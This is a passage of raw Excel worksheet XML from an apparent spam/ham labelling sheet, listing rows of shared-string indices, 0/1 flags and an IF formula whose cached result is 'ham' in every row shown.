      <c r="A1846" t="s">
        <v>1337</v>
      </c>
      <c r="B1846">
        <v>1</v>
      </c>
      <c r="C1846" t="str">
        <f t="shared" si="28"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1847" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1847" t="s">
        <v>1338</v>
      </c>
      <c r="B1847">
        <v>1</v>
      </c>
      <c r="C1847" t="str">
        <f t="shared" si="28"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1848" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1848" t="s">
        <v>21</v>
      </c>
      <c r="B1848">
        <v>1</v>
      </c>
      <c r="C1848" t="str">
        <f t="shared" si="28"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1849" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1849" t="s">
        <v>1339</v>
      </c>
      <c r="B1849">
        <v>1</v>
      </c>
      <c r="C1849" t="str">
        <f t="shared" si="28"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1850" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1850" t="s">
        <v>1340</v>
      </c>
      <c r="B1850">
        <v>1</v>
      </c>
      <c r="C1850" t="str">
        <f t="shared" si="28"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1851" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1851" t="s">
        <v>1341</v>
      </c>
      <c r="B1851">
        <v>1</v>
      </c>
      <c r="C1851" t="str">
        <f t="shared" si="28"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1852" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1852" t="s">
        <v>1342</v>
      </c>
      <c r="B1852">
        <v>1</v>
      </c>
      <c r="C1852" t="str">
        <f t="shared" si="28"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1853" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1853" t="s">
        <v>1343</v>
      </c>
      <c r="B1853">
        <v>1</v>
      </c>
      <c r="C1853" t="str">
        <f t="shared" si="28"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1854" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1854" t="s">
        <v>1344</v>
      </c>
      <c r="B1854">
        <v>1</v>
      </c>
      <c r="C1854" t="str">
        <f t="shared" si="28"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1855" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1855" t="s">
        <v>1282</v>
      </c>
      <c r="B1855">
        <v>1</v>
      </c>
      <c r="C1855" t="str">
        <f t="shared" si="28"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1856" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1856" t="s">
        <v>21</v>
      </c>
      <c r="B1856">
        <v>1</v>
      </c>
      <c r="C1856" t="str">
        <f t="shared" si="28"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1857" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1857" t="s">
        <v>1345</v>
      </c>
      <c r="B1857">
        <v>1</v>
      </c>
      <c r="C1857" t="str">
        <f t="shared" si="28"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1858" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1858" t="s">
        <v>1346</v>
      </c>
      <c r="B1858">
        <v>1</v>
      </c>
      <c r="C1858" t="str">
        <f t="shared" ref="C1858:C1921" si="29">IF(B1858="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="1859" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1859" t="s">
        <v>1347</v>
      </c>
      <c r="B1859">
        <v>1</v>
      </c>
      <c r="C1859" t="str">
        <f t="shared" si="29"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1860" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1860" t="s">
        <v>21</v>
      </c>
      <c r="B1860">
        <v>1</v>
      </c>
      <c r="C1860" t="str">
        <f t="shared" si="29"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1861" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1861" t="s">
        <v>1348</v>
      </c>
      <c r="B1861">
        <v>1</v>
      </c>
      <c r="C1861" t="str">
        <f t="shared" si="29"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1862" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1862" t="s">
        <v>1349</v>
      </c>
      <c r="B1862">
        <v>1</v>
      </c>
      <c r="C1862" t="str">
        <f t="shared" si="29"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1863" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1863" t="s">
        <v>115</v>
      </c>
      <c r="B1863">
        <v>1</v>
      </c>
      <c r="C1863" t="str">
        <f t="shared" si="29"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1864" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1864" t="s">
        <v>1350</v>
      </c>
      <c r="B1864">
        <v>1</v>
      </c>
      <c r="C1864" t="str">
        <f t="shared" si="29"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1865" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1865" t="s">
        <v>1351</v>
      </c>
      <c r="B1865">
        <v>1</v>
      </c>
      <c r="C1865" t="str">
        <f t="shared" si="29"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1866" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1866" t="s">
        <v>1352</v>
      </c>
      <c r="B1866">
        <v>1</v>
      </c>
      <c r="C1866" t="str">
        <f t="shared" si="29"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1867" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1867" t="s">
        <v>1353</v>
      </c>
      <c r="B1867">
        <v>1</v>
      </c>
      <c r="C1867" t="str">
        <f t="shared" si="29"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1868" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1868" t="s">
        <v>1354</v>
      </c>
      <c r="B1868">
        <v>1</v>
      </c>
      <c r="C1868" t="str">
        <f t="shared" si="29"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1869" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1869" t="s">
        <v>1355</v>
      </c>
      <c r="B1869">
        <v>1</v>
      </c>
      <c r="C1869" t="str">
        <f t="shared" si="29"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1870" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1870" t="s">
        <v>1356</v>
      </c>
      <c r="B1870">
        <v>1</v>
      </c>
      <c r="C1870" t="str">
        <f t="shared" si="29"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1871" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1871" t="s">
        <v>1357</v>
      </c>
      <c r="B1871">
        <v>1</v>
      </c>
      <c r="C1871" t="str">
        <f t="shared" si="29"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1872" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1872" t="s">
        <v>1358</v>
      </c>
      <c r="B1872">
        <v>1</v>
      </c>
      <c r="C1872" t="str">
        <f t="shared" si="29"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1873" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1873" t="s">
        <v>1359</v>
      </c>
      <c r="B1873">
        <v>1</v>
      </c>
      <c r="C1873" t="str">
        <f t="shared" si="29"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1874" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1874" t="s">
        <v>21</v>
      </c>
      <c r="B1874">
        <v>1</v>
      </c>
      <c r="C1874" t="str">
        <f t="shared" si="29"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1875" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1875" t="s">
        <v>1360</v>
      </c>
      <c r="B1875">
        <v>1</v>
      </c>
      <c r="C1875" t="str">
        <f t="shared" si="29"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1876" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1876" t="s">
        <v>21</v>
      </c>
      <c r="B1876">
        <v>1</v>
      </c>
      <c r="C1876" t="str">
        <f t="shared" si="29"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1877" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1877" t="s">
        <v>1361</v>
      </c>
      <c r="B1877">
        <v>1</v>
      </c>
      <c r="C1877" t="str">
        <f t="shared" si="29"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1878" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1878" t="s">
        <v>1362</v>
      </c>
      <c r="B1878">
        <v>1</v>
      </c>
      <c r="C1878" t="str">
        <f t="shared" si="29"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1879" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1879" t="s">
        <v>1363</v>
      </c>
      <c r="B1879">
        <v>1</v>
      </c>
      <c r="C1879" t="str">
        <f t="shared" si="29"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1880" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1880" t="s">
        <v>1364</v>
      </c>
      <c r="B1880">
        <v>1</v>
      </c>
      <c r="C1880" t="str">
        <f t="shared" si="29"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1881" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1881" t="s">
        <v>21</v>
      </c>
      <c r="B1881">
        <v>1</v>
      </c>
      <c r="C1881" t="str">
        <f t="shared" si="29"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1882" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1882" t="s">
        <v>1365</v>
      </c>
      <c r="B1882">
        <v>1</v>
      </c>
      <c r="C1882" t="str">
        <f t="shared" si="29"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1883" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1883" t="s">
        <v>1366</v>
      </c>
      <c r="B1883">
        <v>1</v>
      </c>
      <c r="C1883" t="str">
        <f t="shared" si="29"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1884" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1884" t="s">
        <v>1367</v>
      </c>
      <c r="B1884">
        <v>1</v>
      </c>
      <c r="C1884" t="str">
        <f t="shared" si="29"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1885" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1885" t="s">
        <v>1368</v>
      </c>
      <c r="B1885">
        <v>1</v>
      </c>
      <c r="C1885" t="str">
        <f t="shared" si="29"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1886" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1886" t="s">
        <v>1369</v>
      </c>
      <c r="B1886">
        <v>1</v>
      </c>
      <c r="C1886" t="str">
        <f t="shared" si="29"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1887" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1887" t="s">
        <v>1370</v>
      </c>
      <c r="B1887">
        <v>1</v>
      </c>
      <c r="C1887" t="str">
        <f t="shared" si="29"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1888" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1888" t="s">
        <v>1371</v>
      </c>
      <c r="B1888">
        <v>1</v>
      </c>
      <c r="C1888" t="str">
        <f t="shared" si="29"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1889" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1889" t="s">
        <v>1372</v>
      </c>
      <c r="B1889">
        <v>1</v>
      </c>
      <c r="C1889" t="str">
        <f t="shared" si="29"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1890" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1890" t="s">
        <v>1373</v>
      </c>
      <c r="B1890">
        <v>1</v>
      </c>
      <c r="C1890" t="str">
        <f t="shared" si="29"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1891" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1891" t="s">
        <v>1374</v>
      </c>
      <c r="B1891">
        <v>1</v>
      </c>
      <c r="C1891" t="str">
        <f t="shared" si="29"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1892" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1892" t="s">
        <v>1375</v>
      </c>
      <c r="B1892">
        <v>1</v>
      </c>
      <c r="C1892" t="str">
        <f t="shared" si="29"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1893" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1893" t="s">
        <v>1376</v>
      </c>
      <c r="B1893">
        <v>1</v>
      </c>
      <c r="C1893" t="str">
        <f t="shared" si="29"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1894" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1894" t="s">
        <v>21</v>
      </c>
      <c r="B1894">
        <v>1</v>
      </c>
      <c r="C1894" t="str">
        <f t="shared" si="29"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1895" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1895" t="s">
        <v>1377</v>
      </c>
      <c r="B1895">
        <v>1</v>
      </c>
      <c r="C1895" t="str">
        <f t="shared" si="29"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1896" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1896" t="s">
        <v>1378</v>
      </c>
      <c r="B1896">
        <v>1</v>
      </c>
      <c r="C1896" t="str">
        <f t="shared" si="29"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1897" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1897" t="s">
        <v>1379</v>
      </c>
      <c r="B1897">
        <v>1</v>
      </c>
      <c r="C1897" t="str">
        <f t="shared" si="29"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1898" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1898" t="s">
        <v>1380</v>
      </c>
      <c r="B1898">
        <v>0</v>
      </c>
      <c r="C1898" t="str">
        <f t="shared" si="29"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1899" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1899" t="s">
        <v>1381</v>
      </c>
      <c r="B1899">
        <v>0</v>
      </c>
      <c r="C1899" t="str">
        <f t="shared" si="29"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1900" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1900" t="s">
        <v>1382</v>
      </c>
      <c r="B1900">
        <v>0</v>
      </c>
      <c r="C1900" t="str">
        <f t="shared" si="29"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1901" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1901" t="s">
        <v>1383</v>
      </c>
      <c r="B1901">
        <v>0</v>
      </c>
      <c r="C1901" t="str">
        <f t="shared" si="29"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1902" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1902" t="s">
        <v>1384</v>
      </c>
      <c r="B1902">
        <v>0</v>
      </c>
      <c r="C1902" t="str">
        <f t="shared" si="29"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1903" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1903" t="s">
        <v>1385</v>
      </c>
      <c r="B1903">
        <v>0</v>
      </c>
      <c r="C1903" t="str">
        <f t="shared" si="29"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1904" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1904" t="s">
        <v>1386</v>
      </c>
      <c r="B1904">
        <v>0</v>
      </c>
      <c r="C1904" t="str">
        <f t="shared" si="29"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1905" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1905" t="s">
        <v>1387</v>
      </c>
      <c r="B1905">
        <v>0</v>
      </c>
      <c r="C1905" t="str">
        <f t="shared" si="29"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1906" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1906" t="s">
        <v>1388</v>
      </c>
      <c r="B1906">
        <v>0</v>
      </c>
      <c r="C1906" t="str">
        <f t="shared" si="29"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1907" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1907" t="s">
        <v>1389</v>
      </c>
      <c r="B1907">
        <v>0</v>
      </c>
      <c r="C1907" t="str">
        <f t="shared" si="29"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1908" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1908" t="s">
        <v>1390</v>
      </c>
      <c r="B1908">
        <v>0</v>
      </c>
      <c r="C1908" t="str">
        <f t="shared" si="29"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1909" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1909" t="s">
        <v>1391</v>
      </c>
      <c r="B1909">
        <v>0</v>
      </c>
      <c r="C1909" t="str">
        <f t="shared" si="29"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1910" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1910" t="s">
        <v>1392</v>
      </c>
      <c r="B1910">
        <v>0</v>
      </c>
      <c r="C1910" t="str">
        <f t="shared" si="29"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1911" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1911" t="s">
        <v>21</v>
      </c>
      <c r="B1911">
        <v>0</v>
      </c>
      <c r="C1911" t="str">
        <f t="shared" si="29"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1912" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1912" t="s">
        <v>1393</v>
      </c>
      <c r="B1912">
        <v>0</v>
      </c>
      <c r="C1912" t="str">
        <f t="shared" si="29"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1913" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1913" t="s">
        <v>1394</v>
      </c>
      <c r="B1913">
        <v>0</v>
      </c>
      <c r="C1913" t="str">
        <f t="shared" si="29"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1914" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1914" t="s">
        <v>1395</v>
      </c>
      <c r="B1914">
        <v>0</v>
      </c>
      <c r="C1914" t="str">
        <f t="shared" si="29"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1915" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1915" t="s">
        <v>1396</v>
      </c>
      <c r="B1915">
        <v>0</v>
      </c>
      <c r="C1915" t="str">
        <f t="shared" si="29"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1916" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1916" t="s">
        <v>1397</v>
      </c>
      <c r="B1916">
        <v>0</v>
      </c>
      <c r="C1916" t="str">
        <f t="shared" si="29"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1917" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1917" t="s">
        <v>1398</v>
      </c>
      <c r="B1917">
        <v>0</v>
      </c>
      <c r="C1917" t="str">
        <f t="shared" si="29"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1918" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1918" t="s">
        <v>1399</v>
      </c>
      <c r="B1918">
        <v>0</v>
      </c>
      <c r="C1918" t="str">
        <f t="shared" si="29"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1919" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1919" t="s">
        <v>1400</v>
      </c>
      <c r="B1919">
        <v>0</v>
      </c>
      <c r="C1919" t="str">
        <f t="shared" si="29"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1920" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1920" t="s">
        <v>1401</v>
      </c>
      <c r="B1920">
        <v>0</v>
      </c>
      <c r="C1920" t="str">
        <f t="shared" si="29"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1921" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1921" t="s">
        <v>1402</v>
      </c>
      <c r="B1921">
        <v>0</v>
      </c>
      <c r="C1921" t="str">
        <f t="shared" si="29"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1922" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1922" t="s">
        <v>1403</v>
      </c>
      <c r="B1922">
        <v>0</v>
      </c>
      <c r="C1922" t="str">
        <f t="shared" ref="C1922:C1985" si="30">IF(B1922="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="1923" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1923" t="s">
        <v>1404</v>
      </c>
      <c r="B1923">
        <v>0</v>
      </c>
      <c r="C1923" t="str">
        <f t="shared" si="30"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1924" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1924" t="s">
        <v>1405</v>
      </c>
      <c r="B1924">
        <v>0</v>
      </c>
      <c r="C1924" t="str">
        <f t="shared" si="30"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1925" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1925" t="s">
        <v>1406</v>
      </c>
      <c r="B1925">
        <v>0</v>
      </c>
      <c r="C1925" t="str">
        <f t="shared" si="30"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1926" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1926" t="s">
        <v>1407</v>
      </c>
      <c r="B1926">
        <v>0</v>
      </c>
      <c r="C1926" t="str">
        <f t="shared" si="30"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1927" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1927" t="s">
        <v>1408</v>
      </c>
      <c r="B1927">
        <v>0</v>
      </c>
      <c r="C1927" t="str">
        <f t="shared" si="30"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1928" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1928" t="s">
        <v>1409</v>
      </c>
      <c r="B1928">
        <v>0</v>
      </c>
      <c r="C1928" t="str">
        <f t="shared" si="30"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1929" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1929" t="s">
        <v>1410</v>
      </c>
      <c r="B1929">
        <v>0</v>
      </c>
      <c r="C1929" t="str">
        <f t="shared" si="30"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1930" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1930" t="s">
        <v>1411</v>
      </c>
      <c r="B1930">
        <v>0</v>
      </c>
      <c r="C1930" t="str">
        <f t="shared" si="30"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1931" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1931" t="s">
        <v>1412</v>
      </c>
      <c r="B1931">
        <v>0</v>
      </c>
      <c r="C1931" t="str">
        <f t="shared" si="30"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1932" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1932" t="s">
        <v>1413</v>
      </c>
      <c r="B1932">
        <v>0</v>
      </c>
      <c r="C1932" t="str">
        <f t="shared" si="30"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1933" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1933" t="s">
        <v>1414</v>
      </c>
      <c r="B1933">
        <v>0</v>
      </c>
      <c r="C1933" t="str">
        <f t="shared" si="30"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1934" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1934" t="s">
        <v>1415</v>
      </c>
      <c r="B1934">
        <v>0</v>
      </c>
      <c r="C1934" t="str">
        <f t="shared" si="30"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1935" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1935" t="s">
        <v>1416</v>
      </c>
      <c r="B1935">
        <v>0</v>
      </c>
      <c r="C1935" t="str">
        <f t="shared" si="30"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1936" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1936" t="s">
        <v>1417</v>
      </c>
      <c r="B1936">
        <v>0</v>
      </c>
      <c r="C1936" t="str">
        <f t="shared" si="30"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1937" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1937" t="s">
        <v>1418</v>
      </c>
      <c r="B1937">
        <v>0</v>
      </c>
      <c r="C1937" t="str">
        <f t="shared" si="30"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1938" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1938" t="s">
        <v>1419</v>
      </c>
      <c r="B1938">
        <v>0</v>
      </c>
      <c r="C1938" t="str">
        <f t="shared" si="30"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1939" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1939" t="s">
        <v>1420</v>
      </c>
      <c r="B1939">
        <v>0</v>
      </c>
      <c r="C1939" t="str">
        <f t="shared" si="30"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1940" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1940" t="s">
        <v>1421</v>
      </c>
      <c r="B1940">
        <v>0</v>
      </c>
      <c r="C1940" t="str">
        <f t="shared" si="30"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1941" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1941" t="s">
        <v>1422</v>
      </c>
      <c r="B1941">
        <v>0</v>
      </c>
      <c r="C1941" t="str">
        <f t="shared" si="30"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1942" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1942" t="s">
        <v>1423</v>
      </c>
      <c r="B1942">
        <v>0</v>
      </c>
      <c r="C1942" t="str">
        <f t="shared" si="30"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1943" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1943" t="s">
        <v>1424</v>
      </c>
      <c r="B1943">
        <v>0</v>
      </c>
      <c r="C1943" t="str">
        <f t="shared" si="30"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1944" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1944" t="s">
        <v>1425</v>
      </c>
      <c r="B1944">
        <v>0</v>
      </c>
      <c r="C1944" t="str">
        <f t="shared" si="30"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1945" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1945" t="s">
        <v>1426</v>
      </c>
      <c r="B1945">
        <v>0</v>
      </c>
      <c r="C1945" t="str">
        <f t="shared" si="30"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1946" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1946" t="s">
        <v>1427</v>
      </c>
      <c r="B1946">
        <v>0</v>
      </c>
      <c r="C1946" t="str">
        <f t="shared" si="30"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1947" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1947" t="s">
        <v>1428</v>
      </c>
      <c r="B1947">
        <v>0</v>
      </c>
      <c r="C1947" t="str">
        <f t="shared" si="30"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1948" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1948" t="s">
        <v>1429</v>
      </c>
      <c r="B1948">
        <v>0</v>
      </c>
      <c r="C1948" t="str">
        <f t="shared" si="30"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1949" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1949" t="s">
        <v>1430</v>
      </c>
      <c r="B1949">
        <v>0</v>
      </c>
      <c r="C1949" t="str">
        <f t="shared" si="30"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1950" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1950" t="s">
        <v>1431</v>
      </c>
      <c r="B1950">
        <v>0</v>
      </c>
      <c r="C1950" t="str">
        <f t="shared" si="30"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1951" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1951" t="s">
        <v>1432</v>
      </c>
      <c r="B1951">
        <v>0</v>
      </c>
      <c r="C1951" t="str">
        <f t="shared" si="30"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1952" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1952" t="s">
        <v>1433</v>
      </c>
      <c r="B1952">
        <v>0</v>
      </c>
      <c r="C1952" t="str">
        <f t="shared" si="30"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1953" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1953" t="s">
        <v>1434</v>
      </c>
      <c r="B1953">
        <v>0</v>
      </c>
      <c r="C1953" t="str">
        <f t="shared" si="30"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1954" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1954" t="s">
        <v>1435</v>
      </c>
      <c r="B1954">
        <v>0</v>
      </c>
      <c r="C1954" t="str">
        <f t="shared" si="30"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1955" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1955" t="s">
        <v>1436</v>
      </c>
      <c r="B1955">
        <v>0</v>
      </c>
      <c r="C1955" t="str">
        <f t="shared" si="30"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1956" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1956" t="s">
        <v>1437</v>
      </c>
      <c r="B1956">
        <v>0</v>
      </c>
      <c r="C1956" t="str">
        <f t="shared" si="30"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1957" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1957" t="s">
        <v>1438</v>
      </c>
      <c r="B1957">
        <v>0</v>
      </c>
      <c r="C1957" t="str">
        <f t="shared" si="30"/>
        <v>ham</v>
      </c>
    </row>
    <row r="1958" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1958" t="s">
        <v>1439</v>
      </c>
      <c r="B1958">
        <v>0</v>
      </c>
